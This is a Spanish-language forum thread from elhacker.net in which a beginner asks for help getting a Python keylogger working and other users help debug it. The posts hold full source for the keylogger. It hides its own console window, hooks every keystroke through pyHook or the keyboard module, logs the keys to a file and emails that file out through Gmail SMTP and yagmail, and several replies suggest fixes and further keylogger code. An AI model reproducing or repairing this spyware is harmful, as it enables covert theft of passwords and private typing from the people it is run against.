elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Problema con Keylogger en Python (No envía el log)
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Problema con Keylogger en Python (No envía el log)  (Leído 8,073 veces)
TheFerret

Desconectado Desconectado

Mensajes: 44


Ver Perfil
Problema con Keylogger en Python (No envía el log)
« en: 10 Abril 2019, 00:13 am »

Estoy empezando en el mundo de Python y he decidido seguir este pequeño tutorial para hacer un simple Keylogger que envía las capturas al correo electrónico: http://www.pythondiario.com/2017/05/como-crear-un-keylogger-remoto-con.html

El problema viene cuando al alcanzar los caracteres establecidos para que se envíe el log a mi correo, llega un correo vacío, sin asunto, solo con la palabra "capturado"

Adjunto código:

Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3.  
  4. import win32console
  5. import win32gui
  6. import pythoncom,pyHook
  7. import time
  8. import smtplib
  9. import os
  10. import sys
  11. # www.pythondiario.com
  12.  
  13. ########################################################
  14. # CONFIGURAR VARIABLES
  15. ########################################################
  16.  
  17. win = win32console.GetConsoleWindow()
  18. win32gui.ShowWindow(win,0)
  19.  
  20. #crea el archivo .txt
  21. f=open("c:\output.txt","w+")
  22. f.close
  23.  
  24. #Variable que cuenta las tecas presionadas
  25. count = 0
  26.  
  27. ########################################################
  28. # FUNCIONES
  29. ########################################################
  30.  
  31. def send_email(message):
  32.  
  33.    try:
  34.  
  35.        # Datos
  36.        fromaddr = 'correo@gmail.com'
  37.        toaddrs = 'correo@gmail.com'
  38.        username = 'correo@gmail.com'
  39.        password = 'contraseña'
  40.  
  41.        # Enviando el correo
  42.        server = smtplib.SMTP('smtp.gmail.com:587')
  43.        server.starttls()
  44.        server.login(username,password)
  45.        server.sendmail(fromaddr, toaddrs, message)
  46.        server.quit()
  47.  
  48.    except:
  49.  
  50.        pass
  51.  
  52.  
  53. def OnKeyboardEvent(event):
  54.  
  55.    global count
  56.    count += 1
  57.    #presiona CTRL+E para salir
  58.    if event.Ascii==5:
  59.        sys.exit(0)
  60.  
  61.    if event.Ascii !=0 or 8:
  62.        #abre output.txt
  63.        f=open('c:\output.txt','r+')
  64.        buffer=f.read()
  65.        f.close()        
  66.  
  67.        if len(buffer)==1:
  68.            send_email("Arranco...")            
  69.  
  70.        if  count ==100:
  71.            #Envia los ultimos 500 caracteres
  72.            capturado = buffer[-100:].replace("\n"," ")
  73.            send_email("capturado")
  74.            count = 0
  75.  
  76.        #abre output.txt escribe y suma nuevas pulsaciones
  77.        f=open('c:\output.txt','w')
  78.        keylogs=chr(event.Ascii)
  79.  
  80.        #si se presiona ENTER
  81.        if event.Ascii==13:
  82.            keylogs='\n'
  83.  
  84.        #si se preciona ESPACIO
  85.        if event.Ascii==32:
  86.            keylogs=''
  87.  
  88.        buffer+=keylogs
  89.        f.write(buffer)
  90.        f.close()
  91.  
  92.  
  93. # crea el objeto hook manager
  94. hm = pyHook.HookManager()
  95. hm.KeyDown = OnKeyboardEvent
  96. # set the hook
  97. hm.HookKeyboard()
  98. # wait forever
  99. pythoncom.PumpMessages()


Del código original de la web, he modificado 'elif' por 'if' pues de lo contrario ni me envía el mensaje, '(capturado)' por '("capturado")', y he reducido el envío de fichero a la pulsación de 100 caracteres. Bueno y he cambiado el correo y la contraseña por motivos evidentes. ¿Sabéis que está fallando? Mil gracias de antemano :huh:


En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #1 en: 12 Abril 2019, 17:36 pm »

Probaste send_email(capturado) en vez de send_email("capturado").

No lo analice del todo, pero puede ser eso. Que envíe el string capturado y no los datos almacenados en capturado.

PD: Acabo de leer el final. Prueba, por partes, primero, si almacena correctamente los datos, imprimiendolos en consola, en lugar de enviarlos. Si lo hace, allí no esta el problema.

O Averiguar si server, posee alguna restricción con el tipo de dato o el tamaño.


« Última modificación: 12 Abril 2019, 17:52 pm por Segadorfelix » En línea

TheFerret

Desconectado Desconectado

Mensajes: 44


Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #2 en: 13 Abril 2019, 03:41 am »

He cambiado
Código
  1. win32gui.ShowWindow(win,0)
a
Código
  1. win32gui.ShowWindow(win,1)
para que me muestre los errores en la terminal y me sale este error, el cual no consigo solucionar en estos momentos:
Código
  1.  event = KeyboardEvent(msg, vk_code, scan_code, ascii, flags, time, hwnd, win_name)
  2. SystemError: <class 'pyHook.HookManager.KeyboardEvent'> returned a result with an error set
  3. TypeError: an integer is required (got type NoneType)

Lo que he buscado sobre el error no me ha aclarado mucho, si tienes alguna idea es de agradecer!
En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #3 en: 13 Abril 2019, 05:04 am »

Recomendaría que volvieras al código original. Por dos razones:

*El elif debería funcionar si el valor buffer aumenta correctamente.
*El '(capturado)' debe enviar la variable. Mientras que el '("capturado")' envía un el string "capturado", por eso solo llega esa palabra.

No eliminar el código 'modificado'. Sino probar ambos y ver resultados.

Coloca print(buffer), print(message) y print(count). En varias zonas del codigo, para ver por consola, si realmente están cambiando como deberían, lo cual supongo que no, alguna variable debe estar fallando.

No creo que el modulo para enviar mensajes, falle, ya que llega al menos un mensaje.

Si ya has probado con seriedad todo lo anterior, entonces prueba si

Código
  1. hm = pyHook.HookManager()
  2. hm.KeyDown = OnKeyboardEvent
  3. # set the hook
  4. hm.HookKeyboard()

requiere algun valor numérico.

Código
  1. f=open("c:\output.txt","w+")
  2. f.close
  3.  

También, sería bueno (aunque no creo que altere el error), cambiar f.close a f.close()

Por ultimo, si es por tener un Keylogger funcional y este código sigue fallando, puedes ver los últimos comentarios del link de phytondiario, en donde colocan otros códigos. Y también en la red, hay keylogger en python cuantos, se quieran.

En línea

TheFerret

Desconectado Desconectado

Mensajes: 44


Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #4 en: 13 Abril 2019, 06:02 am »

Vuelvo al código original;
*El elif vuelve a donde estaba anteriormente
*La variable vuelve a ser '(capturado)'

-Sí, el mensaje llega o llegaba hasta ahora, de todas formas he probado otro módulo de mensajes anteriormente como alternativa y funciona también, el problema no debe estar ahí..

-He colocado print en varias zonas del código con las variables que me comentas y me salta un error por cada una de ellas con "NameError: name 'buffer' is not defined"

-Me ha llegado el primer error de Sintaxis del código original:
Código
  1. capturado = buffer[-500:].replace("\n","
  2.                                                                              ^
  3. SyntaxError: EOL while scanning string literal

Interpreto que quería poner un replace("\n"," ") para que los espacios no sean legibles. Con permiso corrijo eso para que pueda continuar corriendo el código.

Perdona mi ignorancia, pero cómo compruebo si requiere un valor numérico?

*Cambiado f.close a f.close()

-Sí, soy consciente, pero mi idea aparte de tener un keylogger funcional, es aprender código para entenderlo poco a poco, y que menos, que tratando de hacer uno y que salga para adelante...

-Muchas gracias de antemano por todo


EDITO: El print(count) funciona sin darme error; pero se queda a 0. El problema es que al pulsar cualquier tecla salta esto:
Código
  1. Traceback (most recent call last):
  2.  File "C:\Users\Andrés\AppData\Local\Programs\Python\Python37-32\lib\site-packages\pyHook\HookManager.py", line 348, in KeyboardSwitch
  3.    event = KeyboardEvent(msg, vk_code, scan_code, ascii, flags, time, hwnd, win_name)
  4. SystemError: <class 'pyHook.HookManager.KeyboardEvent'> returned a result with an error set
« Última modificación: 13 Abril 2019, 06:07 am por TheFerret » En línea

TheFerret

Desconectado Desconectado

Mensajes: 44


Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #5 en: 13 Abril 2019, 21:24 pm »

Vuelvo al código original;
*El elif vuelve a donde estaba anteriormente
*La variable vuelve a ser '(capturado)'

-Sí, el mensaje llega o llegaba hasta ahora, de todas formas he probado otro módulo de mensajes anteriormente como alternativa y funciona también, el problema no debe estar ahí..

-He colocado print en varias zonas del código con las variables que me comentas y me salta un error por cada una de ellas con "NameError: name 'buffer' is not defined"

-Me ha llegado el primer error de Sintaxis del código original:
Código
  1. capturado = buffer[-500:].replace("\n","
  2.                                                                              ^
  3. SyntaxError: EOL while scanning string literal

Interpreto que quería poner un replace("\n"," ") para que los espacios no sean legibles. Con permiso corrijo eso para que pueda continuar corriendo el código.

Perdona mi ignorancia, pero cómo compruebo si requiere un valor numérico?

*Cambiado f.close a f.close()

-Sí, soy consciente, pero mi idea aparte de tener un keylogger funcional, es aprender código para entenderlo poco a poco, y que menos, que tratando de hacer uno y que salga para adelante...

-Muchas gracias de antemano por todo


EDITO: El print(count) funciona sin darme error; pero se queda a 0. El problema es que al pulsar cualquier tecla salta esto:
Código
  1. Traceback (most recent call last):
  2.  File "C:\Users\Andrés\AppData\Local\Programs\Python\Python37-32\lib\site-packages\pyHook\HookManager.py", line 348, in KeyboardSwitch
  3.    event = KeyboardEvent(msg, vk_code, scan_code, ascii, flags, time, hwnd, win_name)
  4. SystemError: <class 'pyHook.HookManager.KeyboardEvent'> returned a result with an error set




El fallo al parecer se encuentra en el módulo de PyHook en Python3. Técnicamente en Python 2 debería funcionar sin problemas según he leído.Para no abrir otro tema prosigo aquí. He cambiado el código por el de este tutorial que usa otro módulo:Keyboard.
https://recursospython.com/codigos-de-fuente/keylogger-para-windows-y-linux/

Y he añadido usando el módulo yagmail  un script para que envíe un correo con el fichero. Funcionan bien....por separado.Si ejecuto primero el script de recursospython y después el script de yagmail funciona sin problemas. Pero en cuanto uno ambos script en uno solo, deja de funcionar. Soluciones?

Código añadido:
Código
  1. from functools import partial
  2. import atexit
  3. import os
  4. import keyboard
  5. import time, datetime
  6. import smtplib
  7. import yagmail
  8. import sys
  9.  
  10.  
  11.  
  12. yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
  13. yag
  14. img = "C:/Users/Andrés/Desktop/keys.txt"
  15. yag.send('correo@gmail.com', "Birthday", contents = [img])
En línea

yuimugi912

Desconectado Desconectado

Mensajes: 20



Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #6 en: 19 Abril 2019, 03:52 am »

podrias usar el GetAsyncKeyState
https://gist.github.com/inaz2/541da967ad04d06b975e
En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #7 en: 20 Abril 2019, 22:45 pm »



El fallo al parecer se encuentra en el módulo de PyHook en Python3. Técnicamente en Python 2 debería funcionar sin problemas según he leído.Para no abrir otro tema prosigo aquí. He cambiado el código por el de este tutorial que usa otro módulo:Keyboard.
https://recursospython.com/codigos-de-fuente/keylogger-para-windows-y-linux/

Y he añadido usando el módulo yagmail  un script para que envíe un correo con el fichero. Funcionan bien....por separado.Si ejecuto primero el script de recursospython y después el script de yagmail funciona sin problemas. Pero en cuanto uno ambos script en uno solo, deja de funcionar. Soluciones?

Código añadido:
Código
  1. from functools import partial
  2. import atexit
  3. import os
  4. import keyboard
  5. import time, datetime
  6. import smtplib
  7. import yagmail
  8. import sys
  9.  
  10.  
  11.  
  12. yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
  13. yag
  14. img = "C:/Users/Andrés/Desktop/keys.txt"
  15. yag.send('correo@gmail.com', "Birthday", contents = [img])

Sé que podría se que lo que voy a pedir puede parecer innecesario. Pero, podrías postear. Los dos scripts a parte, que funcionan.

Y luego el script 'completo' que falla.

Así, sería más sencillo fijarse que es lo que falla. Si es que al definir cierta variable en uno, afecta al otro, o cambia la forma en la que lee los datos, por ejemplo.
En línea

yuimugi912

Desconectado Desconectado

Mensajes: 20



Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #8 en: 20 Abril 2019, 23:46 pm »

segun leo en stackoverflow debes ponerle un return 0; a la funcion OnKeyboardEvent(event):
podrias probar  :P
« Última modificación: 20 Abril 2019, 23:49 pm por yuimugi912 » En línea

TheFerret

Desconectado Desconectado

Mensajes: 44


Ver Perfil
Re: Problema con Keylogger en Python (No envía el log)
« Respuesta #9 en: 21 Abril 2019, 21:02 pm »

Sé que podría se que lo que voy a pedir puede parecer innecesario. Pero, podrías postear. Los dos scripts a parte, que funcionan.

Y luego el script 'completo' que falla.

Así, sería más sencillo fijarse que es lo que falla. Si es que al definir cierta variable en uno, afecta al otro, o cambia la forma en la que lee los datos, por ejemplo.


PRIMER SCRIPT:

Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #
  4. #   Copyright 2013-2017 Recursos Python
  5. #   www.recursospython.com
  6. #
  7. from functools import partial
  8. import atexit
  9. import os
  10. import keyboard
  11. import yagmail
  12. MAP = {
  13.    "space": " ",
  14.    "\r": "\n"
  15. }
  16. # Ubicación y nombre del archivo que guarda las teclas presionadas.
  17. FILE_NAME = "keys.txt"
  18. # Determina si el archivo de salida es limpiado cada vez que se
  19. # inicia el programa.
  20. CLEAR_ON_STARTUP = False
  21. # Tecla para terminar el programa o None para no utilizar ninguna tecla.
  22. TERMINATE_KEY = "esc"
  23. def callback(output, is_down, event):
  24.    if event.event_type in ("up", "down"):
  25.        key = MAP.get(event.name, event.name)
  26.        modifier = len(key) > 1
  27.        # Capturar únicamente los modificadores cuando están siendo
  28.        # presionados.
  29.        if not modifier and event.event_type == "down":
  30.            return
  31.        # Evitar escribir múltiples veces la misma tecla si está
  32.        # siendo presionada.
  33.        if modifier:
  34.            if event.event_type == "down":
  35.                if is_down.get(key, False):
  36.                    return
  37.                else:
  38.                    is_down[key] = True
  39.            elif event.event_type == "up":
  40.                is_down[key] = False
  41.            # Indicar si está siendo presionado.
  42.            key = " [{} ({})] ".format(key, event.event_type)
  43.        elif key == "\r":
  44.            # Salto de línea.
  45.            key = "\n"
  46.        # Escribir la tecla al archivo de salida.
  47.        output.write(key)
  48.        # Forzar escritura.
  49.        output.flush()
  50. def onexit(output):
  51.    output.close()
  52. def main():
  53.    # Borrar el archivo previo.
  54.    if CLEAR_ON_STARTUP:
  55.        os.remove(FILE_NAME)
  56.  
  57.    # Indica si una tecla está siendo presionada.
  58.    is_down = {}
  59.  
  60.    # Archivo de salida.
  61.    output = open(FILE_NAME, "a")
  62.  
  63.    # Cerrar el archivo al terminar el programa.
  64.    atexit.register(onexit, output)
  65.  
  66.    # Instalar el registrador de teclas.
  67.    keyboard.hook(partial(callback, output, is_down))
  68.    keyboard.wait(TERMINATE_KEY)
  69.  
  70. if __name__ == "__main__":
  71.    main()
  72.  


SEGUNDO SCRIPT:


Código
  1. from functools import partial
  2. import atexit
  3. import os
  4. import keyboard
  5. import time, datetime
  6. import smtplib
  7. import yagmail
  8. import sys
  9.  
  10.  
  11.  
  12. yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
  13. yag
  14. img = "C:/Users/Andrés/Desktop/keys.txt"
  15. yag.send('correo@gmail.com', "Birthday", contents = [img])
  16.  
  17. if __name__ == "__main__":
  18.    main()
  19.  


AMBOS SCRIPT JUNTOS:


Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #
  4. #   Copyright 2013-2017 Recursos Python
  5. #   www.recursospython.com
  6. #
  7. from functools import partial
  8. import atexit
  9. import os
  10. import keyboard
  11. import yagmail
  12. MAP = {
  13.    "space": " ",
  14.    "\r": "\n"
  15. }
  16. # Ubicación y nombre del archivo que guarda las teclas presionadas.
  17. FILE_NAME = "keys.txt"
  18. # Determina si el archivo de salida es limpiado cada vez que se
  19. # inicia el programa.
  20. CLEAR_ON_STARTUP = False
  21. # Tecla para terminar el programa o None para no utilizar ninguna tecla.
  22. TERMINATE_KEY = "esc"
  23. def callback(output, is_down, event):
  24.    if event.event_type in ("up", "down"):
  25.        key = MAP.get(event.name, event.name)
  26.        modifier = len(key) > 1
  27.        # Capturar únicamente los modificadores cuando están siendo
  28.        # presionados.
  29.        if not modifier and event.event_type == "down":
  30.            return
  31.        # Evitar escribir múltiples veces la misma tecla si está
  32.        # siendo presionada.
  33.        if modifier:
  34.            if event.event_type == "down":
  35.                if is_down.get(key, False):
  36.                    return
  37.                else:
  38.                    is_down[key] = True
  39.            elif event.event_type == "up":
  40.                is_down[key] = False
  41.            # Indicar si está siendo presionado.
  42.            key = " [{} ({})] ".format(key, event.event_type)
  43.        elif key == "\r":
  44.            # Salto de línea.
  45.            key = "\n"
  46.        # Escribir la tecla al archivo de salida.
  47.        output.write(key)
  48.        # Forzar escritura.
  49.        output.flush()
  50. def onexit(output):
  51.    output.close()
  52. def main():
  53.    # Borrar el archivo previo.
  54.    if CLEAR_ON_STARTUP:
  55.        os.remove(FILE_NAME)
  56.  
  57.    # Indica si una tecla está siendo presionada.
  58.    is_down = {}
  59.  
  60.    # Archivo de salida.
  61.    output = open(FILE_NAME, "a")
  62.  
  63.    # Cerrar el archivo al terminar el programa.
  64.    atexit.register(onexit, output)
  65.  
  66.    # Instalar el registrador de teclas.
  67.    keyboard.hook(partial(callback, output, is_down))
  68.    keyboard.wait(TERMINATE_KEY)
  69.  
  70. yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
  71. yag
  72. img = "C:/Users/Andrés/Desktop/keys.txt"
  73. yag.send('correo@gmail.com', "Birthday", contents = [img])
  74.  
  75. if __name__ == "__main__":
  76.    main()
  77.  
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Python] Kaley, Keylogger simple en Python
Scripting
Fyrox 0 7,169 Último mensaje 21 Septiembre 2011, 23:24 pm
por Fyrox
[Python] Simple Keylogger
Scripting
BigBear 0 4,052 Último mensaje 7 Octubre 2011, 01:38 am
por BigBear
problema con creacion de keylogger python!!
Scripting
eliander20 0 2,178 Último mensaje 17 Septiembre 2016, 11:07 am
por eliander20
BeeLogger|KEYLOGGER|PYTHON|
Hacking
d0r127 7 10,398 Último mensaje 4 Diciembre 2017, 06:38 am
por T1cxT4c
Mejorar el keylogger PYTHON
Scripting
botters 0 1,829 Último mensaje 13 Febrero 2019, 03:07 am
por botters
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines